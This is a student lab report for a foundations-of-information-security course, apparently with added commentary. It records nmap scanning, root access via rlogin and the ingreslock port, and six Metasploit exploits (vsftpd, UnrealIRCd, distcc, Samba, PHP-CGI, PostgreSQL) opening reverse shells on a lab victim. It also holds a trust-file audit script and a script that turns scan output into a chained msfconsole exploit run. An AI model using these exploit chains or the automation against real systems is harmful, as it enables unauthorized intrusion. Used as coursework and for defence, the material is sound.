POSTS AND TELECOMMUNICATIONS INSTITUTE OF TECHNOLOGY (Học viện Công nghệ Bưu chính Viễn thông)
HIGH-QUALITY PROGRAMME FACULTY
FOUNDATIONS OF INFORMATION SECURITY
Lab exercise 1
Student name: NGUYỄN LÊ ANH TÚ
Student ID: B21DCCN751
Class: E21CQCN03-B
Contents
Question 1: Theory
Question 2: Lab content
Question 1: Theory
a. Metasploit
• Use the Metasploit tool to exploit known vulnerabilities through the victim's open service ports.
• Use commands/programs such as:
  o ifconfig: display or change network interface settings
  o nmap: port and service scanner
  o metasploit: exploitation framework that carries out the attack
Question 2: Lab content
a. Metasploit
• Find the IP addresses with the "ifconfig" command
Attacker (note the first attempt uses the Windows command name, which does not exist on Linux):

ubuntu@attacker:~$ ipconfig
-bash: ipconfig: command not found
ubuntu@attacker:~$ ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.1.3  netmask 255.255.255.0  broadcast 192.168.1.255
        ether 02:42:c0:a8:01:03  txqueuelen 0  (Ethernet)
        RX packets 69  bytes 8924 (8.7 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0  overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0  overruns 0  carrier 0  collisions 0
ubuntu@attacker:~$
Victim (older net-tools output format):

ubuntu@victim:~$ ifconfig
eth0      Link encap:Ethernet  HWaddr 02:42:c0:a8:01:02
          inet addr:192.168.1.2  Bcast:192.168.1.255  Mask:255.255.255.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:59 errors:0 dropped:0 overruns:0 frame:0
          TX packets:26 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:7523 (7.3 KB)  TX bytes:3018 (2.9 KB)

lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:73 errors:0 dropped:0 overruns:0 frame:0
          TX packets:73 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:23013 (22.4 KB)  TX bytes:23013 (22.4 KB)
ubuntu@victim:~$
• Ping from the attacker (192.168.1.3) to the victim (192.168.1.2)
(tail of an earlier ping run visible at the top of the terminal)
25 packets transmitted, 25 received, 0% packet loss, time 24571ms
rtt min/avg/max/mdev = 0.039/0.051/0.076/0.008 ms
ubuntu@attacker:~$ ping 192.168.1.2
PING 192.168.1.2 (192.168.1.2) 56(84) bytes of data.
64 bytes from 192.168.1.2: icmp_seq=1 ttl=64 time=0.079 ms
64 bytes from 192.168.1.2: icmp_seq=7 ttl=64 time=0.077 ms
64 bytes from 192.168.1.2: icmp_seq=8 ttl=64 time=0.063 ms
64 bytes from 192.168.1.2: icmp_seq=19 ttl=64 time=0.068 ms
[remaining replies not legible in the screenshot; all answered with ttl=64]
rtt min/avg/max/mdev = 0.062/0.081/0.243/0.031 ms

• Use nmap to scan for service ports that could be attacked
ubuntu@attacker:~$ nmap -p0-65535 192.168.1.2
Starting Nmap 7.80 ( https://nmap.org ) at 2024-03-19 14:54 UTC
Nmap scan report for metasploit.victim.student.lan (192.168.1.2)
Host is up (0.000053s latency).
Not shown: 65509 closed ports
STATE SERVICE          (the PORT column did not survive extraction; 27 ports are open)
open  ftp
open  ssh
open  telnet
open  smtp
open  http
open  rpcbind
open  netbios-ssn
open  microsoft-ds
open  exec
open  login
open  shell
open  rmiregistry
open  ingreslock
open  ccproxy-ftp
open  mysql
open  distccd
open  postgresql
open  vnc
open  X11
open  irc
open  ircs-u
open  ajp13
open  unknown
open  msgsrvr
open  unknown
open  unknown
open  unknown
Nmap done: 1 IP address (1 host up) scanned in 9.96 seconds

• Exploit the rlogin service. The login below succeeds as root with no password prompt, which means rlogind on the victim trusts the attacker host (for root this goes through a permissive /root/.rhosts).
ubuntu@attacker:~$ rlogin -l root 192.168.1.2
Last login: Tue Mar 19 10:50:02 EDT 2024 from :0.0 on pts/2
Linux victim 4.18.0-15-generic #16~18.04.1-Ubuntu SMP Thu Feb 7 14:06:04 UTC 2019 x86_64

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
root@victim:~# cat /root/filetoview.txt
# Filename: filetoview.txt
#
# Description: This is a pre-created file for each student (victim) container.
# This file is modified when container is created.
# The string below will be replaced with a keyed hash.
My string is: 3731f24ee1c780b60d412137d0d0f317
root@victim:~#
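The passwordless root rlogin above is only possible because of r-services trust files. As an added example (not part of the lab report), the POSIX shell script below audits those files for the wildcard entries that grant such access; it is the check a defender would run on the victim. The directory layout it creates is constructed sample data, and the file names (/etc/hosts.equiv, /root/.rhosts, ~/.rhosts) are the standard ones rlogind reads, not paths taken from the report.

```shell
#!/bin/sh
# Added example, not from the lab report. rlogind grants a login without a
# password when the client host (and optionally user) appears in
# /etc/hosts.equiv or in the target user's ~/.rhosts. hosts.equiv is not
# consulted for root, so "rlogin -l root" needs a permissive /root/.rhosts.
# Each trust-file line is "host [user]"; a field of "+" means "any".

# audit_trust_file FILE
# Prints one line per wildcard entry. Returns 1 if any was found, 0 if the
# file is missing or clean.
audit_trust_file() {
    file=$1
    found=0
    if [ ! -f "$file" ]; then
        return 0
    fi
    # "|| [ -n ... ]" keeps a last line that has no trailing newline.
    while IFS= read -r line || [ -n "$line" ]; do
        line=${line%%#*}          # strip comments
        set -- $line              # $1 = host field, $2 = optional user field
        if [ $# -eq 0 ]; then
            continue
        fi
        if [ "$1" = "+" ]; then
            echo "$file: any host trusted: '$1 ${2:-}'"
            found=1
        fi
        if [ "${2:-}" = "+" ]; then
            echo "$file: any user trusted: '$1 $2'"
            found=1
        fi
    done < "$file"
    return $found
}

# audit_host ROOT
# Audits the system-wide and per-user trust files below ROOT (use / on a
# live host). Returns 1 if any file grants wildcard trust.
audit_host() {
    root=${1%/}
    bad=0
    for f in "$root/etc/hosts.equiv" "$root/root/.rhosts" "$root"/home/*/.rhosts; do
        if ! audit_trust_file "$f"; then
            bad=1
        fi
    done
    return $bad
}

# make_sample_root
# Builds a temporary directory laid out like a trusting victim and prints
# its path. Constructed sample data, not copied from the lab victim.
make_sample_root() {
    d=$(mktemp -d)
    mkdir -p "$d/etc" "$d/root" "$d/home/ubuntu"
    printf '# lab convenience, never do this\n+ +\n' > "$d/root/.rhosts"
    printf 'build1.lan\nbuild2.lan ubuntu\n' > "$d/etc/hosts.equiv"
    printf '# nothing trusted here\n' > "$d/home/ubuntu/.rhosts"
    echo "$d"
}

# Stand-alone run: audit the constructed sample and report the verdict.
sample=$(make_sample_root)
if audit_host "$sample"; then
    echo "no wildcard trust found under $sample"
else
    echo "wildcard trust found under $sample"
fi
rm -rf "$sample"
```

Entries such as "build2.lan ubuntu" are deliberately not flagged: they trust one named account from one named host, which is the intended (if still weak, host-name based) use of these files. The "+ +" line in the sample is the configuration that turns rlogin into a passwordless root shell for any host on the network.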
• Exploit the ingreslock service. TCP port 1524 on the victim serves a root shell with no authentication, so a plain telnet connection is enough.
ubuntu@attacker:~$ telnet 192.168.1.2 1524
Trying 192.168.1.2...
Connected to 192.168.1.2.
Escape character is '^]'.
root@victim:/# cat /root/filetoview.txt
cat /root/filetoview.txt
# Filename: filetoview.txt
#
# Description: This is a pre-created file for each student (victim) container.
# This file is modified when container is created.
# The string below will be replaced with a keyed hash.
My string is: 3731f24ee1c780b60d412137d0d0f317
root@victim:/#
exit
Connection closed by foreign host.

• Use the Metasploit tool to exploit the services distccd, IRC daemon, vsftpd, Samba, HTTP and PostgreSQL

ubuntu@attacker:~$ msfconsole
[-] *** Starting the Metasploit Framework console...
[-] * WARNING: No database support: No database YAML file
[-] ***
[ASCII-art banner omitted]

       =[ ... exploits - 1074 auxiliary - 330 post        ]
       =[ 556 payloads - 45 encoders - 10 nops            ]
       =[ 4 evasion                                       ]
msf5 > search distccd
Matching Modules: exploit/unix/misc/distcc_exec (DistCC Daemon Command Execution)

msf5 > use exploit/unix/misc/distcc_exec
msf5 exploit(unix/misc/distcc_exec) > options

Module options (exploit/unix/misc/distcc_exec):
   Name    Current Setting  Required  Description
   RHOSTS                   yes       The target address range or CIDR identifier

Exploit target:
   Id  Name
   0   Automatic Target

msf5 exploit(unix/misc/distcc_exec) > set RHOST 192.168.1.2
RHOST => 192.168.1.2
msf5 exploit(unix/misc/distcc_exec) > exploit

Started reverse TCP double handler on 192.168.1.3:4444
Accepted the first client connection...
Command: echo CkkhSpkp41Prfk7Z;
Writing to socket A
Reading from sockets...
Reading from socket B
B: "CkkhSpkp41Prfk7Z\r\n"
Matching...
A is input...
Command shell session 1 opened (192.168.1.3:4444 -> 192.168.1.2:60256) at 2024-03-19 15:09:55 +0000

cat /root/filetoview.txt
# Filename: filetoview.txt
#
# Description: This is a pre-created file for each student (victim) container.
# This file is modified when container is created.
# The string below will be replaced with a keyed hash.
My string is: 3731f24ee1c780b60d412137d0d0f317
(search output, top cut off in the screenshot)
Matching Modules: exploit/unix/irc/unreal_ircd_3281_backdoor (UnrealIRCD 3.2.8.1 Backdoor Command Execution)

msf5 > use exploit/unix/irc/unreal_ircd_3281_backdoor
msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > options

Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):
   Name    Current Setting  Required  Description
   (option rows not legible in the screenshot)

Exploit target:
   Id  Name
   0   Automatic Target

msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > set RHOST 192.168.1.2
RHOST => 192.168.1.2
msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > exploit

Started reverse TCP double handler on 192.168.1.3:4444
192.168.1.2:6667 - Connected to 192.168.1.2:6667...
    :irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...
192.168.1.2:6667 - Sending backdoor command...
Accepted the first client connection...
Accepted the second client connection...
Command: echo BHMYoLTuMvwJMqS0;
Writing to socket A
Reading from sockets...
Reading from socket B
B: "BHMYoLTuMvwJMqS0\r\n"
Matching...
A is input...
Command shell session 1 opened (192.168.1.3:4444 -> 192.168.1.2:60266) at 2024-03-19 15:15:27 +0000

cat /root/filetoview.txt
# Filename: filetoview.txt
#
# Description: This is a pre-created file for each student (victim) container.
# This file is modified when container is created.
# The string below will be replaced with a keyed hash.
My string is: 3731f24ee1c780b60d412137d0d0f317
(search output, top cut off in the screenshot)
Matching Modules: exploit/unix/ftp/vsftpd_234_backdoor (VSFTPD v2.3.4 Backdoor Command Execution)

msf5 > use exploit/unix/ftp/vsftpd_234_backdoor
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > options

Module options (exploit/unix/ftp/vsftpd_234_backdoor):
   Name    Current Setting  Required  Description
   (option rows not legible in the screenshot)

Exploit target:
   (not legible in the screenshot)

msf5 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOST 192.168.1.2
RHOST => 192.168.1.2
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > exploit

192.168.1.2:21 - Banner: 220 (vsFTPd 2.3.4)
192.168.1.2:21 - USER: 331 Please specify the password.
192.168.1.2:21 - Backdoor service has been spawned, handling...
192.168.1.2:21 - UID: uid=0(root) gid=0(root)
Found shell.
Command shell session 1 opened (192.168.1.3:43749 -> 192.168.1.2:6200) at 2024-03-19 15:29:08 +0000

cat /root/filetoview.txt
# Filename: filetoview.txt
#
# Description: This is a pre-created file for each student (victim) container.
# This file is modified when container is created.
# The string below will be replaced with a keyed hash.
My string is: 3731f24ee1c780b60d412137d0d0f317
(search output, top cut off in the screenshot)
Matching Modules: exploit/multi/samba/usermap_script (Samba "username map script" Command Execution)

msf5 > use exploit/multi/samba/usermap_script
msf5 exploit(multi/samba/usermap_script) > options

Module options (exploit/multi/samba/usermap_script):
   Name    Current Setting  Required  Description
   (option rows not legible in the screenshot)

Exploit target:
   Id  Name
   0   Automatic

msf5 exploit(multi/samba/usermap_script) > set RHOST 192.168.1.2
RHOST => 192.168.1.2
msf5 exploit(multi/samba/usermap_script) > exploit

Started reverse TCP double handler on 192.168.1.3:4444
Accepted the first client connection...
Accepted the second client connection...
Command: echo RSOtiSOFXmsaL9qz;
Writing to socket A
Reading from sockets...
Reading from socket A
A: "sh: line 2: Connected: command not found\r\nsh: line 3: Escape: command not found\r\nRSOtiSOFXmsaL9qz\r\n"
Matching...
B is input...
Command shell session 1 opened (192.168.1.3:4444 -> 192.168.1.2:60286) at 2024-03-19 15:37:28 +0000

cat /root/filetoview.txt
# Filename: filetoview.txt
#
# Description: This is a pre-created file for each student (victim) container.
# This file is modified when container is created.
# The string below will be replaced with a keyed hash.
My string is: 3731f24ee1c780b60d412137d0d0f317
(search output, top cut off in the screenshot)
Matching Modules: exploit/multi/http/php_cgi_arg_injection (PHP CGI Argument Injection)

msf5 > use exploit/multi/http/php_cgi_arg_injection
msf5 exploit(multi/http/php_cgi_arg_injection) > options

Module options (exploit/multi/http/php_cgi_arg_injection):
   Name         Description
   RHOSTS       The target address range or CIDR identifier
   RPORT        The target port (TCP)
   SSL          Negotiate SSL/TLS for outgoing connections
   TARGETURI    The URI to request (must be a CGI-handled PHP script)
   URIENCODING  Level of URI URIENCODING and padding (0 for minimum)
   VHOST        HTTP server virtual host
   (Current Setting and Required columns not legible in the screenshot)

Exploit target:
   Id  Name
   0   Automatic

msf5 exploit(multi/http/php_cgi_arg_injection) > set RHOST 192.168.1.2
RHOST => 192.168.1.2
msf5 exploit(multi/http/php_cgi_arg_injection) > exploit

Started reverse TCP handler on 192.168.1.3:4444
Sending stage (38247 bytes) to 192.168.1.2
Meterpreter session 1 opened (192.168.1.3:4444 -> 192.168.1.2:60296) at 2024-03-19 15:47:16 +0000

meterpreter > cat /root/filetoview.txt
# Filename: filetoview.txt
#
# Description: This is a pre-created file for each student (victim) container.
# This file is modified when container is created.
# The string below will be replaced with a keyed hash.
My string is: 3731f24ee1c780b60d412137d0d0f317
meterpreter >
(search output, top cut off in the screenshot)
Matching Modules:
   exploit/linux/postgres/postgres_payload                                  PostgreSQL for Linux Payload Execution
   exploit/windows/postgres/postgres_payload  2009-04-10  excellent  Yes  PostgreSQL for Microsoft Windows Payload Execution

msf5 > use exploit/linux/postgres/postgres_payload
msf5 exploit(linux/postgres/postgres_payload) > options

Module options (exploit/linux/postgres/postgres_payload):
   Name      Current Setting  Description
   PASSWORD  postgres         The password for the specified username. Leave blank for a random password.
   (other option rows not legible in the screenshot)

Exploit target:
   Id  Name
   0   Linux x86

msf5 exploit(linux/postgres/postgres_payload) > set RHOST 192.168.1.2
RHOST => 192.168.1.2
msf5 exploit(linux/postgres/postgres_payload) > exploit

Started reverse TCP handler on 192.168.1.3:4444
192.168.1.2:5432 - PostgreSQL 8.3.1 on i486-pc-linux-gnu, compiled by GCC cc (GCC) 4.2.3 (Ubuntu 4.2.3-2ubuntu4)
Uploaded as /tmp/emaJchgN.so, should be cleaned up automatically
Sending stage (985320 bytes) to 192.168.1.2
Meterpreter session 1 opened (192.168.1.3:4444 -> 192.168.1.2:60304) at 2024-03-19 15:53:24 +0000

meterpreter > cat /root/filetoview.txt
# Filename: filetoview.txt
#
# Description: This is a pre-created file for each student (victim) container.
# This file is modified when container is created.
# The string below will be replaced with a keyed hash.
My string is: 3731f24ee1c780b60d412137d0d0f317
meterpreter >
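The whole exercise is one procedure: scan with nmap, read the service list, pick the matching Metasploit module, set RHOST, exploit, read the flag. As an added example (not part of the lab report), the POSIX shell script below automates the middle of that chain: it parses nmap's normal output, maps each open service to the module the report used for it, and writes an msfconsole resource (.rc) file that replays the runs, with reminders for the two services attacked by hand (rlogin, ingreslock). The sample scan it writes is constructed: the report's PORT column did not survive extraction, so the port numbers are nmap's default assignments for those service names, not values read from the report. `setg RHOSTS`/`setg LHOST` are used in place of the report's per-module `set RHOST`; RHOSTS is the option name in msf5 and RHOST is accepted as its alias.

```shell
#!/bin/sh
# Added example, not from the lab report: nmap service list -> msfconsole
# resource script. The service -> module pairing is the one the report used;
# every other open service is listed as a comment so nothing is silently skipped.

# write_sample_scan FILE
# Writes a constructed sample of `nmap -p0-65535` normal output. Ports are the
# nmap-services defaults for these names (the report's PORT column was lost).
write_sample_scan() {
    cat > "$1" <<'EOF'
Nmap scan report for metasploit.victim.student.lan (192.168.1.2)
Host is up (0.000053s latency).
Not shown: 65525 closed ports
PORT      STATE SERVICE
21/tcp    open  ftp
22/tcp    open  ssh
80/tcp    open  http
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
513/tcp   open  login
1524/tcp  open  ingreslock
3306/tcp  open  mysql
3632/tcp  open  distccd
5432/tcp  open  postgresql
6667/tcp  open  irc
EOF
}

# open_services SCANFILE -> one "port service" line per open TCP port
open_services() {
    awk '$2 == "open" && $1 ~ /^[0-9]+\/tcp$/ { split($1, p, "/"); print p[1], $3 }' "$1"
}

# module_for SERVICE -> module the report used for that service,
# "manual" for services attacked without Metasploit, empty if none.
module_for() {
    case "$1" in
        ftp)                      echo exploit/unix/ftp/vsftpd_234_backdoor ;;
        irc)                      echo exploit/unix/irc/unreal_ircd_3281_backdoor ;;
        distccd)                  echo exploit/unix/misc/distcc_exec ;;
        netbios-ssn|microsoft-ds) echo exploit/multi/samba/usermap_script ;;
        http)                     echo exploit/multi/http/php_cgi_arg_injection ;;
        postgresql)               echo exploit/linux/postgres/postgres_payload ;;
        login|ingreslock)         echo manual ;;
        *)                        echo "" ;;
    esac
}

# candidate_modules SCANFILE -> unique module paths, one per line
# (netbios-ssn and microsoft-ds both point at usermap_script; sort -u dedupes).
candidate_modules() {
    open_services "$1" | while read -r port svc; do
        m=$(module_for "$svc")
        case "$m" in exploit/*) echo "$m" ;; esac
    done | sort -u
}

# build_rc SCANFILE RHOST LHOST OUTFILE -> writes the resource script
build_rc() {
    scan=$1 rhost=$2 lhost=$3 out=$4
    {
        echo "# generated from $scan; run with: msfconsole -r $out"
        echo "setg RHOSTS $rhost"
        echo "setg LHOST $lhost"
        candidate_modules "$scan" | while read -r m; do
            echo "use $m"
            echo "exploit -j"       # run as a background job; list with: sessions -l
        done
        open_services "$scan" | while read -r port svc; do
            case "$(module_for "$svc")" in
                manual)
                    case "$svc" in
                        login)      echo "# manual: rlogin -l root $rhost" ;;
                        ingreslock) echo "# manual: telnet $rhost $port" ;;
                    esac ;;
                "") echo "# no module used in this lab for $svc/$port" ;;
            esac
        done
    } > "$out"
}

# Stand-alone run against the constructed scan.
work=$(mktemp -d)
write_sample_scan "$work/scan.txt"
build_rc "$work/scan.txt" 192.168.1.2 192.168.1.3 "$work/lab.rc"
cat "$work/lab.rc"
rm -rf "$work"
```

Against a real scan, pass the file produced by `nmap -oN scan.txt -p0-65535 <victim>`; the resulting .rc reproduces the six Metasploit runs from the report in one `msfconsole -r lab.rc` invocation and leaves the r-services and ingreslock steps as explicit manual reminders.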
• Check work